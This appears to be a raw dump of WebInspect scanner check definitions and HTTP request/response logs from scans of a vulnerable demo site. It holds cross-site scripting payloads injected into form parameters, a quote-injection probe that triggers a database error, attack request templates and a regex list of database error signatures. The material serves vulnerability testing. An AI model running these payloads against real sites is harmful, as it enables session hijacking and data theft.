<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>test@<script>alert(document.cookie)</script>.com</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /scripts/weblog HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:30:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT
ETag: "b4fe491aadc11:8f6"
Content-Length: 25
blehblehblbhelbhlebghlebhWebLog Administrative Access BypassphpWebLog version 0.4.2 (with PHP versions below 4.0 rc1).<BR><BR>
In common.inc.php, $CONF is not properly initialized as an array; this allows users to alter the contents stored inside it. The alteration of the content allows attackers to bypass the administrative authentication.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |401GET /forgot2.asp?msg2=no&msg=We%2Bcould%2Bnot%2Bfind%2Byour%2Be%2Dmail%2Baddress%2Bin%2Bour%2Bdatabase.%2BPlease%2Bjoin%2Bbelow. HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1887
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?msg2=no&msg=We%2Bcould%2Bnot%2Bfind%2Byour%2Be%2Dmail%2Baddress%2Bin%2Bour%2Bdatabase.%2BPlease%2Bjoin%2Bbelow. <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
GET /forgot1.asp?get=\' HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 361
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '[user] = '\'''.</font>
<p>
<font face="Arial" size=2>/forgot1.asp</font><font face="Arial" size=2>, line 8</font> Database Server Error MessageA database server error message was found, indicating that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has received user input that it did not expect and does not know how to handle. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the database.<BR><BR>The most common cause of this error is a failure to properly sanitize client-supplied data that is used in SQL statements. It can also be caused by a bug in the web application's database communication code, a misconfiguration of database connection settings, or any other reason that would cause the application's database driver to be unable to establish a working session with the server.<P>The error message may also contain the location of the file that contains the offending function. This may disclose the webroot's absolute path as well as give the attacker the location of application "include" files or database configuration information. It may even disclose the portion of code that failed.
<BR><BR>
This check is part of WebInspect's unknown application testing. Unknown application testing seeks to uncover new vulnerabilities in both custom and commercial software. Because of this, there are no specific patches or descriptions of this issue.<br><br>Please note that this vulnerability may be a false positive if the page it is flagged on is technical documentation relating to a database server.GET <var name="path"/>?get=\' <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
[SQL\sServer] Or Microsoft\sOLE\sDB\sProvider\sfor\sODBC\sDrivers Or [ODBC\sMicrosoft\sAccess\s97\sDriver] Or [ODBC\sMicrosoft\sAccess\sDriver] Or Microsoft\sJET\sDatabase\sEngine Or [Oracle]ORA Or [ODBC\sdriver\sfor\sOracle] Or Microsoft\sOLE\sDB\sProvider\sfor\sOracle Or ODBC\sError Or [ODBC\sOracle\s8\sdriver] Or ADODB.Recordset.1 Or Microsoft\sOLE\sDB\sProvider\sfor\sSQL\sServer Or syntax\serror\sin\sorder\sby Or Dynamic\sPage\sGeneration\sError: Or quoted\sstring\snot\sproperly\sterminated Or DBD::Oracle Or COM.ibm.db2.jdbc.DB2ExceptionGET /plink.asp?a=>"><script>alert("XSS")</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"><script>alert("XSS")</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>>"><script>alert("XSS")</script></attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:33 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 202
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was test@<script>alert(document.cookie)</script>.com
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>test@<script>alert(document.cookie)</script>.com</attack>test@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=test@<script>alert(document.cookie)</script>.com&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>test@<script>alert(document.cookie)</script>.com</attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3989
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"'><img src="javascript:alert('XSS')"></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>>"'><img%20src="javascript:alert('XSS')"></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /_vti_cnf/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_cnf/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
